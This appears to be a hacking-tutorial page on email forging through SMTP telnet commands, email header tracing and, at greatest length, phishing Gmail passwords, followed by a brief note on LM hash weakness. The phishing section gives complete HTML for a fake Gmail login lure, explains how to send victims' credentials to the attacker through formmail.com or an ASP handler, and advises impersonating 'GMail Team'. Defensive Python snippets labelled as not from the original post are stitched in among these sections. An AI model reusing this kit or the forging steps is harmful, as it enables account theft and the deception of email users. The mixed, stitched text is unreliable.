
EMail Forging



-: EMail Forging :-


2) EMail Forging :-
Email forging allows an attacker to disguise the source of an email and send it to the victim. Most attackers use this technique to fool the victim into believing that somebody else has sent the email.
The SMTP protocol makes it extremely easy for an attacker to send forged emails to a remote user.
Typically an attacker carries out email forging by the following steps:

1)
Start Command Prompt and type the following command-
c:/>telnet smtp.mailserver.com 25
or c:/>telnet mail.domain.com 25
example:- c:/>telnet smtp.gmail.com 25
The above command opens a telnet connection to the specified remote mail server on port 25, the default SMTP port on which the outgoing mail daemon runs.

2)
Once you are connected to the mail daemon of the remote mail server, you will be greeted with a message similar to the following:-


If you are not familiar with the SMTP mail daemon commands, enter the keyword 'help' at the daemon, which may reveal all the supported commands as shown below.



3)
The correct sequence of commands to be executed is:-
a) helo mailserver1.com
b) mail from:abc@mailserver1.com
c) rcpt to:xyz@mailserver2.com
d) data
e) . (the dot command represents the end of the mail body)
All of this is shown in the figure below:



Email forging by this technique is not possible if mail relaying is disabled by its service provider.














EMail Hacking

-: EMail Hacking :-


All email communications on the internet are possible by two protocols:
1) Simple Mail Transfer Protocol (SMTP port-25)
2) Post Office Protocol (POP port-110)

E-Mail hacking consists of various techniques as discussed below.

1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by the following diagram.

Mail-Path


The most effective and easiest way to trace an email is to analyze its email headers. This can be done by just viewing the full header of the received email. A typical email header looks something like this:


From Barr Thu Jan 3 05:33:26 2008
X-Apparently-To: prasannasherekar@yahoo.co.in via 203.104.16.34; Thu, 03 Jan 2008 05:25:38 +0530
X-YahooFilteredBulk: 189.160.34.89
X-Originating-IP: [189.160.34.89]
Return-Path: <atiles@destatis.de>
Authentication-Results: mta113.mail.in.yahoo.com from=destatis.de; domainkeys=neutral (no sig)
Received: from 189.160.34.89 (HELO dsl-189-160-34-89.prod-infinitum.com.mx) (189.160.34.89) by mta113.mail.in.yahoo.com with SMTP; Thu, 03 Jan 2008 05:25:38 +0530
Received: from dvapa ([141.203.33.92]) by dsl-189-160-34-89.prod-infinitum.com.mx with Microsoft SMTPSVC(6.0.3790.0); Wed, 2 Jan 2008 18:03:26 -0600
Message-ID: <477C264E.3000604@destatis.de>
Date: Wed, 2 Jan 2008 18:03:26 -0600
From: "Barr" <atiles@destatis.de>
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: prasannasherekar@yahoo.co.in
Subject: angel rubberneck
Content-Type: multipart/related; boundary="------------030604060204000701040304"
Content-Length: 16433 



The above email header gives us the following information about its origin and path:
a) Sender's email address :- atiles@destatis.de
b) Source IP address :- 141.203.33.92
c) Source mail server :- dsl-189-160-34-89.prod-infinitum.com.mx
d) Email client :- Thunderbird 2.0.0.6
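
The same reading of the header, as an added example (not code from the original post) that also covers the forging steps described earlier: only the `Received` line written by the recipient's own provider is trustworthy, while every hop below it and the `From` address are supplied by the sending side. The `trusted_suffix` argument and the function names are assumptions of this sketch.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Header lines copied from the sample above; the body is omitted.
SAMPLE = """\
Return-Path: <atiles@destatis.de>
Authentication-Results: mta113.mail.in.yahoo.com from=destatis.de; domainkeys=neutral (no sig)
Received: from 189.160.34.89 (HELO dsl-189-160-34-89.prod-infinitum.com.mx) (189.160.34.89) by mta113.mail.in.yahoo.com with SMTP; Thu, 03 Jan 2008 05:25:38 +0530
Received: from dvapa ([141.203.33.92]) by dsl-189-160-34-89.prod-infinitum.com.mx with Microsoft SMTPSVC(6.0.3790.0); Wed, 2 Jan 2008 18:03:26 -0600
From: "Barr" <atiles@destatis.de>
To: prasannasherekar@yahoo.co.in
Subject: angel rubberneck

"""

IP_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
HELO_RE = re.compile(r"HELO ([^\s)]+)")

def parse_hop(value):
    """Split one Received value into the sending side and the recording host."""
    value = " ".join(value.split())              # unfold continuation lines
    sender, _, rest = value.partition(" by ")
    ips = IP_RE.findall(sender)
    helo = HELO_RE.search(sender)
    return {"ip": ips[-1] if ips else None,
            "helo": helo.group(1).lower() if helo else None,
            "by": rest.split()[0].lower() if rest else None}

def trace(raw, trusted_suffix):
    """trusted_suffix: domain of the receiving provider's own MTAs (assumption)."""
    msg = message_from_string(raw)
    hops = [parse_hop(v) for v in msg.get_all("Received", [])]   # newest first
    edge = next((h for h in hops if (h["by"] or "").endswith(trusted_suffix)), None)
    below = hops[hops.index(edge) + 1:] if edge else hops
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    auth = msg.get("Authentication-Results", "")
    return {
        "verified_ip": edge["ip"] if edge else None,   # recorded by the trusted MTA
        "claimed_ips": [h["ip"] for h in below],       # sender-supplied, forgeable
        "from_domain": from_domain,
        "authenticated": bool(re.search(r"=\s*pass\b", auth)),
        "helo_in_from_domain": bool(from_domain and edge and edge["helo"]
                                    and edge["helo"].endswith(from_domain)),
    }

if __name__ == "__main__":
    print(trace(SAMPLE, "yahoo.com"))
```

For this message the connecting host sits outside the `From` domain and no authentication check passed, which is the pattern a forged sender address leaves behind.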


Tips: There are lots of ready-made tools available on the internet which perform email tracing very effectively and show the exact geographical location of the email sender on the world map.


Recommended Tools
NeoTrace: http://www.neotrace.com
VisualRoute: http://visualroute.visualware.com
E-MailTracker: http://www.visualware.com

 

Cracking GMail Account Password

-: Cracking GMail Account Password :-


Here is the most effective technique for cracking GMail account passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :-   90%


Step-1 : Create your own fake gmail login form using HTML, which may look like the one shown below-

 
           
The HTML code for above login screen created by me is given below-

                                         <html lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type=text/css>
<!--
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin-top:2}

.c {width: 4; height: 4}

.bubble {background-color:#C3D9FF}

.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}

.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}

.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}

.feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; }
.feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; }

// -->
</style>

<title>
  Gmail: Email from Google

</title>
  </noscript>
</head>
<body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload="OnLoad()">
<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
  <tr valign=top>
    <td width=1%> <img src="https://mail.google.com/mail/help/images/logo.gif" border=0 width=143 height=59 alt="Gmail" align=left vspace=10/> </noscript>
    </td>
  <td width=99% bgcolor=#ffffff valign=top>
  <table width=100% cellpadding=1>
  <tr valign=bottom>
  <td><div align=right> </div></td>
  </tr>
  <tr>
  <td nowrap=nowrap>
  <table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>

  <tr>
  <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
  <script>utmx_section("title")</script>
  <td class=bubble rowspan=2 style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td>
  <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
  </noscript>
  </tr>
  <tr>

  <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>
  <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
  </tr>
  </table>
  </td>
  </tr>
  </table>
  </td>
  </tr>

</table>
  <table width=94% align=center cellpadding=5 cellspacing=1>
  <tr>
  <td valign=top style="text-align:left"><b>A Google approach to email.</b>
  <td valign=top>
  </tr>
  <tr>
  <td width=75% valign=top>

  <p style="margin-bottom: 0;text-align:left"><font size=-1> Dear <b><victim name></b>,
  <br><br>
  <table align="center" width="75%">
  <tr><td><font size="-1">
  We are moving database partly to our new server.<br>
  This require your account verification for proper redirection...!<br>
  Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br>
  Repply this message within 72 hours.<br>
  Thank You ! for your Co-Operation........!
  </font><br><br>
  <b>GMail Team</b>
  </td></tr></table>
  </font>
      </p>
</noscript>
      </noscript> </td>  <td valign=top>
      <div id=login>
        <form id="gaia_loginform" action="login.asp" method="post">
<div id="gaia_loginbox">
<table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0">

  <tr>
                <td valign="top" style="text-align:center" nowrap="nowrap"
        bgcolor="#e8eefa">
                  <div class="loginBox">
                    <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0">
                      <tr>
                        <td colspan="2" align="center">
                          <table>
                            <tr>
                              <td valign="top"><font color="#0000FF">G</font><font color="#FF0000">o</font><font color="#FFCC33">o</font><font color="#0000FF">g</font><font color="#009900">l</font><font color="#FF0000">e</font></td>
                              <td valign="middle"> <font size="+0"><b>Account</b></font>
                              </td>
                            </tr>
                          </table></td>
                      </tr>
                      <script type="text/javascript"><!--
    function onPreCreateAccount() {
   
      return true;
   
    }

    function onPreLogin() {
   
     
      if (window["onlogin"] != null) {
        return onlogin();
      } else {
        return true;
      }
   
    }
  --></script>
                      <tr>
                        <td colspan="2" align="center"> </td>
                      </tr>
                      <tr>
                        <td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl">
                            Username: </span> </div></td>
                        <td> <input type="text" name="Email"  id="Email"
  size="18" value=""
 
    class='gaia le val'
 
  /> </td>
                      </tr>
                      <tr>
                        <td></td>
                        <td align="left"> </td>
                      </tr>
                      <tr>
                        <td align="right"> <span class="gaia le lbl"> Password:
                          </span> </td>
                        <td> <input type="password"
   name="Passwd" id="Passwd"
  size="18"
 
    class="gaia le val"
 
  /> </td>
                      </tr>
                      <tr>
                        <td> </td>
                        <td align="left"> </td>
                      </tr>
                      <tr>
                        <td> </td>
                        <td align="left"> <input type="submit" class="gaia le button" name="signIn"
           value="Move"
                  /> </td>
                      </tr>
                    </table>
  </div>
  </td>
  </tr>
</table>
</div>
</form>
      </div>    <br>
      <table class=form-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links>
        <tr bgcolor=#E8EEFA>
          <td valign=top align="center"><font size=+0><br>
            <font size="-1"> <a href="http://mail.google.com/mail/help/intl/en/about.html">About
            Gmail</a
                  >     <a href="http://mail.google.com/mail/help/intl/en/about_whatsnew.html">New
            features!</a> </font> </font></td>
  </table>
  </noscript>
     
  </table>
<br>
<table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
  <tr>
  <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
  <td class=bubble rowspan=2 style=text-align:left>
  <div align=center>
  <font size=-1 color=#666666>©2008 Google -
  <a href="http://www.google.com/a/help/intl/en/users/user_features.html#utm_medium=et&utm_source=gmail-en&utm_campaign=crossnav&token=gmail_footer">Gmail for Organizations</a> -
  <a href="http://gmailblog.blogspot.com/?utm_source=en-gmftr&utm_medium=et&utm_content=gmftr">Gmail Blog</a> -
  <a href="http://mail.google.com/mail/help/intl/en/terms.html">Terms</a>

  - <a href="http://mail.google.com/support/">Help</a>
  </font>
  </div>
  </td>
  <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
  </tr>
  <tr>
  <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>

  <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
  </tr>
</table>
</body>
</html>




           
Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by the victim can either be stored in a database or sent directly to a predefined e-mail address.
This can be done in two ways-

1)
Using online form processors, which are freely available and ready to use.
eg. One such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account, and may be something like the following-


            Your form must start with the following <form> HTML tag:<br>
            <form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192">
            You must also include the following hidden configuration fields
              in your form so that formmail.com knows what account and form processor
              to use on the submitted data:
              <input type="hidden" name="_pid" value="94566">
              <input type="hidden" name="_fid" value="36THG54Z">
              You must also inform this form processor who you wish to have your
              form results emailed to. To do so, you must include a hidden form
              field that specifies the recipient:
              <input type="hidden" name="recipient" value="your email address">
              Please Note: the above field will work, but an even better solution
              is to use the ID number for that email address (thus hiding your
              address from spammers):
              <input type="hidden" name="recipient" value="1">
               



                                                 OR
 
2) If you have your own domain hosted on some server and know the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for the fake gmail login form given above. Here you only have to put both the 'gmail.html' and 'login.asp' files on your server.


Step-3 : Now both your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an HTML mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and clicking on the 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use a fake name such as 'GMail Team' or 'GMail' while sending the fake login form to the victim.

As soon as the victim clicks on the 'Move' button, he/she gets redirected to a predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

Done.......?
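
A mail-gateway check for the lure described in Steps 1 to 3, as an added example that is not part of the original post: it parses the HTML body of an incoming message and reports any form that collects a password, together with where that form posts. The class and function names, the `claimed_domain` parameter and the `forms.example.net` host are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class CredentialFormFinder(HTMLParser):
    """Record each <form> in an HTML mail body and whether it asks for a password."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_mail_html(html, claimed_domain):
    """Return one finding per password form; claimed_domain is the brand the mail uses."""
    finder = CredentialFormFinder()
    finder.feed(html)
    findings = []
    for form in finder.forms:
        if not form["password"]:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        if not host:
            findings.append("password form, relative or empty action: %r" % form["action"])
        elif host == claimed_domain or host.endswith("." + claimed_domain):
            findings.append("password form inside mail body, posts to " + host)
        else:
            findings.append("password form posts off-domain to " + host)
    return findings

# Constructed samples: the first two mirror the form structure shown above.
LOCAL = '<form action="login.asp" method="post"><input type="password" name="Passwd"/></form>'
REMOTE = ('<form method="POST" action="http://forms.example.net/cgi-bin/fp">'
          '<input type="text" name="Email"><input type="password" name="Passwd"></form>')
BENIGN = '<form action="https://www.google.com/search"><input type="text" name="q"></form>'
```

Any finding is grounds to quarantine the message, since a legitimate provider does not collect account passwords through a form embedded in an e-mail.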




-: Password Hacking :-


Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using the following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are fewer than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
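
An audit view of that split, as an added example (not code from the original post): a 7-character half that contains only padding always hashes to the same fixed value, so a stored LM hash shows at a glance which accounts carry it and which passwords fit in one half. The pwdump-style input format (`user:rid:lm:nt:::`), the function name and the sample values are assumptions of this sketch.

```python
EMPTY_HALF = "AAD3B435B51404EE"   # LM value of a 7-character half that is all padding

def audit_lm(dump_text):
    """Classify accounts in pwdump-style lines (user:rid:lm:nt:::) by LM exposure."""
    report = {}
    for line in dump_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4:
            continue                          # not an account line
        user, lm = fields[0], fields[2].upper()
        if len(lm) != 32 or lm == EMPTY_HALF * 2:
            report[user] = "no-lm"            # LM storage off, or blank password
        elif lm[16:] == EMPTY_HALF:
            report[user] = "lm-short"         # password fits in the first half (<= 7 chars)
        else:
            report[user] = "lm-split"         # two halves, each hashed on its own
    return report

# Constructed sample: hash values are placeholders, not hashes of real passwords.
SAMPLE_DUMP = """\
alice:1001:0123456789ABCDEFAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF:::
bob:1002:0123456789ABCDEFFEDCBA9876543210:FFEEDDCCBBAA99887766554433221100:::
carol:1003:AAD3B435B51404EEAAD3B435B51404EE:0F1E2D3C4B5A69788796A5B4C3D2E1F0:::
"""

if __name__ == "__main__":
    for user, status in audit_lm(SAMPLE_DUMP).items():
        print(user, status)
```

Accounts reported as `lm-short` or `lm-split` are the ones to remediate by disabling LM hash storage and forcing a password change.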

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.